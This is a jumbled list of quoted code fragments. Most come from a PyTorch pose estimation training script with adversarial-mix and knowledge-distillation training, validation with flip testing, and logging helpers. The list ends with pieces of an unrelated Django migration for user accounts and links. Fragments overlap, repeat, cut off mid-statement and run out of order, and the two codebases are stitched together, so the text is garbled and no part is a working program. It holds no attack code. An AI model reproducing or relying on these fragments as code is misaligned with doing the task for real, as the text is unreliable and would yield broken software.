optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1)", "record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config)", "input.size(0) # measure accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred", "criterion(outputs, target, target_weight) # compute gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step()", "= model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D", "import print_function import time import logging import os, copy import numpy as np", "------------------------------------------------------------------------------ # Copyright (c) Microsoft # Licensed under the MIT License. # Written", "accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output, target,", "# measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred =", "5] = score image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ == 0:", "'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time,", "input = input.cuda() # compute output torch.cuda.synchronize() infer_start = time.time() outputs = model(input)", "tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() # compute output torch.cuda.synchronize() infer_start =", "= 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data", "_, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc,", "outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i", "G: compute gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp)", "cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() #", "score = meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx", "'.join(['| {}'.format(name) for name in names]) + ' |' ) logger.info('|---' * (num_values+1)", "record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config)", "writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator # markdown format output def", "name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps']", "in nets: if net is not None: for param in net.parameters(): param.requires_grad =", "= time.time() if i % config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\", "0:-1] output = (output + output_flipped) * 0.5 if not cpu: target =", "tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import torch.nn as nn", "cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time()", "accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end", "# compute output torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end = time.time()", "= np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx += num_images", "target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0))", "end) end = time.time() if i % config.PRINT_FREQ == 0: msg = 'Epoch:", "' + ' '.join(['| {}'.format(name) for name in names]) + ' |' )", "pred * 4, output, prefix) print('=> The average inference time is :', time_gpu", "writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps']", "AverageMeter(object): \"\"\"Computes and stores the average and current value\"\"\" def __init__(self): self.reset() def", "inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time()", "* (1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute", "not cpu: input = input.cuda() # compute output torch.cuda.synchronize() infer_start = time.time() outputs", "time.time() # corresponding center scale joint c = meta['center'].numpy() s = meta['scale'].numpy() score", "= target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight)", "config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values,", "avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end)", "AverageMeter() if isinstance(model, list): model = model[0].train() model_D = model[1].train() else: model.train() end", "i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps =", "0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True)", "msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\", "__init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0", "logger.info( '| ' + full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value) for", "acc = AverageMeter() if isinstance(model, list): model = model[0].train() model_D = model[1].train() else:", "len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6))", "def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets = [nets] for net in", "args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time", "# double check this all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2]", "os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm, pred * 4, output, prefix)", "if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True)", "Licensed under the MIT License. # Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from", "optimizer.step() # measure accuracy and record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred", "= criterion(output, target, target_weight) num_images = input.size(0) # measure accuracy and record loss", "names = name_value.keys() values = name_value.values() num_values = len(name_value) logger.info( '| Arch '", "len(name_value) logger.info( '| Arch ' + ' '.join(['| {}'.format(name) for name in names])", "return name_values, perf_indicator # markdown format output def _print_name_value(name_value, full_arch_name): names = name_value.keys()", "(<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division from __future__", "model[1].train() else: model.train() end = time.time() for i, (input, target, target_weight, meta) in", "outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss", "= optimizers[1] end = time.time() for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)):", "copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset, model, criterion, output_dir,", "name_value.keys() values = name_value.values() num_values = len(name_value) logger.info( '| Arch ' + '", "'_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset,", "- end) # mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs =", "for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu: input =", "filenames = [] imgnums = [] idx = 0 feat_dict = {} with", "writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc',", "meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight =", "0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _ in inputs] target =", "i ) save_debug_images(config, input, meta, target_hm, pred * 4, output, prefix) print('=> The", "= outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu:", "global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4,", "val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature", "def train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time =", "cpu: input = input.cuda() # compute output torch.cuda.synchronize() infer_start = time.time() outputs =", "all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value", "batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss',", "optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses =", "switch to evaluate mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS,", "> 0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _ in inputs] target", "= time.time() for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end)", "if not isinstance(nets, list): nets = [nets] for net in nets: if net", "losses = AverageMeter() acc = AverageMeter() if isinstance(models, list): model = models[0].train() model_G", "# G: compute gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs =", "avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt)", "not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not", "model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar(", "writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix", "tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset, model, criterion,", "batch_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() # switch to evaluate", ":, :, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output = (output +", "= writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] =", "AverageMeter() losses = AverageMeter() acc = AverageMeter() # switch to evaluate mode model.eval()", "target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) #", "not aligned, shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :,", "losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) output =", "({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t'", "mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 )", "num_images, 5] = score image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ ==", "= name_value.values() num_values = len(name_value) logger.info( '| Arch ' + ' '.join(['| {}'.format(name)", "= [nets] for net in nets: if net is not None: for param", "all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames = [] imgnums = []", "= logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict):", "prefix) print('=> The average inference time is :', time_gpu / len(val_loader)) name_values, perf_indicator", "self.avg = 0 self.sum = 0 self.count = 0 def update(self, val, n=1):", "models[1].train() model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end", "acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm,", "inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import torch.nn as nn from tqdm", "'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f}", "pred = accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() -", "\\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format(", "optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and record loss losses.update(loss.item(), input.size(0)) _, avg_acc,", "target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end =", "= writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1", "= AverageMeter() losses = AverageMeter() acc = AverageMeter() # switch to evaluate mode", "= model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped", "= score image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ == 0: msg", "time.time() for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs", "= input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped", "= target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1)", "'val'), i ) save_debug_images(config, input, meta, target_hm, pred * 4, output, prefix) print('=>", "i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input)", "= accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end)", ":', time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path,", "set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G = -criterion(output, target,", "model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd =", "output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc = AverageMeter()", "0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4] =", "save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset, model,", "writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator", "avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt)", "import logging import os, copy import numpy as np import torch from core.evaluate", "target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(),", "config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss", "torch.nn.functional as F logger = logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer,", "loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute gradient and do update step", "tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm = target", "image_path, filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value in", "model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes", "torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs, list): output = outputs[-1] else:", "= config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values,", "prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets = [nets] for net", "3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames = []", "output = outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() #", "for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0]", "= inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad()", "output torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu", "tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp += inputs[list_index]", "loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc',", "__future__ import print_function import time import logging import os, copy import numpy as", "division from __future__ import print_function import time import logging import os, copy import", "do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and record loss losses.update(loss.item(),", "loss.backward() optimizer.step() # measure accuracy and record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt,", "preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :,", "'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader),", "loss_G.backward() optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt,", "__future__ import division from __future__ import print_function import time import logging import os,", "if net is not None: for param in net.parameters(): param.requires_grad = requires_grad def", "teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight)", "num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx", "os, copy import numpy as np import torch from core.evaluate import accuracy from", "global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps + 1", "+= (infer_end - infer_start) if isinstance(outputs, list): output = outputs[-1] else: output =", "data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps)", "train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter()", "core.evaluate import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back,", "[] filenames = [] imgnums = [] idx = 0 feat_dict = {}", "model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs, list):", "target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target,", ") writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for name_value in name_values:", "input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list):", "inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4,", "and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs", "= [] filenames = [] imgnums = [] idx = 0 feat_dict =", "# measure accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred =", "+ num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image'])", "for value in values]) + ' |' ) class AverageMeter(object): \"\"\"Computes and stores", "AverageMeter() acc = AverageMeter() if isinstance(models, list): model = models[0].train() model_G = models[1].train()", "tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() #", "copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs,", "speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val,", "= accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end)", "update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G =", "maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :, 0:2]", "= 0 feat_dict = {} with torch.no_grad(): end = time.time() time_gpu = 0.", "{loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses,", "'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp,", "= requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict):", "acc.avg, global_steps ) if isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value),", "full_arch_name = full_arch_name[:8] + '...' logger.info( '| ' + full_arch_name + ' '", "4, output, prefix) print('=> The average inference time is :', time_gpu / len(val_loader))", "targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input =", "else: model.train() end = time.time() for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)):", "i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel =", "else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps + 1 return name_values,", "not isinstance(nets, list): nets = [nets] for net in nets: if net is", "isinstance(outputs, list): output = outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped =", "all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4]", "The average inference time is :', time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate(", "num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes =", "data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(model, list): model", "'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps", "# ------------------------------------------------------------------------------ # Copyright (c) Microsoft # Licensed under the MIT License. #", "target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] > 0.5", "= AverageMeter() acc = AverageMeter() if isinstance(models, list): model = models[0].train() model_G =", "data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs", "if isinstance(outputs, list): output = outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped", "import numpy as np import torch from core.evaluate import accuracy from core.inference import", "15: full_arch_name = full_arch_name[:8] + '...' logger.info( '| ' + full_arch_name + '", "step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and record loss losses.update(loss.item(), input.size(0)) _,", "= \\ output_flipped.clone()[:, :, :, 0:-1] output = (output + output_flipped) * 0.5", "param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir,", "+ output_flipped) * 0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm = target", "all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:,", "model_D = model[1].train() else: model.train() end = time.time() for i, (input, target, target_weight,", "+ 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs,", "AverageMeter() acc = AverageMeter() if isinstance(model, list): model = model[0].train() model_D = model[1].train()", "License. # Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from", "for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values)," ]
[ "b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'),", "class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations = [ migrations.CreateModel(", "(b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])), ('donation_link', models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100,", "blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[ ('id',", "only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and - _ characters", "(b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$',", "take up to 24 hours to update your location on the map.', max_length=200,", "models, migrations import django.db.models.deletion from django.conf import settings import django.core.validators class Migration(migrations.Migration): dependencies", "verbose_name='ID', blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[", "from __future__ import unicode_literals from django.db import models, migrations import django.db.models.deletion from django.conf", "fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests", "import settings import django.core.validators class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ]", "you tweet/stream/post about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every single", "choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)),", "('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol", "(1, 'Sometimes'), (2, 'Often'), (3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={", "models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings icon, then", "b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam',", "to update your location on the map.', max_length=200, null=True, verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)),", "models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and", "you want. You can add formatting and links using Markdown.', null=True, verbose_name='Description', blank=True)),", "want. You can add formatting and links using Markdown.', null=True, verbose_name='Description', blank=True)), ('location',", "-*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations", "Your ID is the number you see on top of the window.', null=True,", "verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'),", "then tap \"Profile\". Your ID is the number you see on top of", "the number you see on top of the window.', null=True, verbose_name='ID', blank=True)), ('owner',", "max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and - _ characters are allowed.')])), ('relevance',", "username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and - _", "max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand',", "('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'),", "name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write whatever you 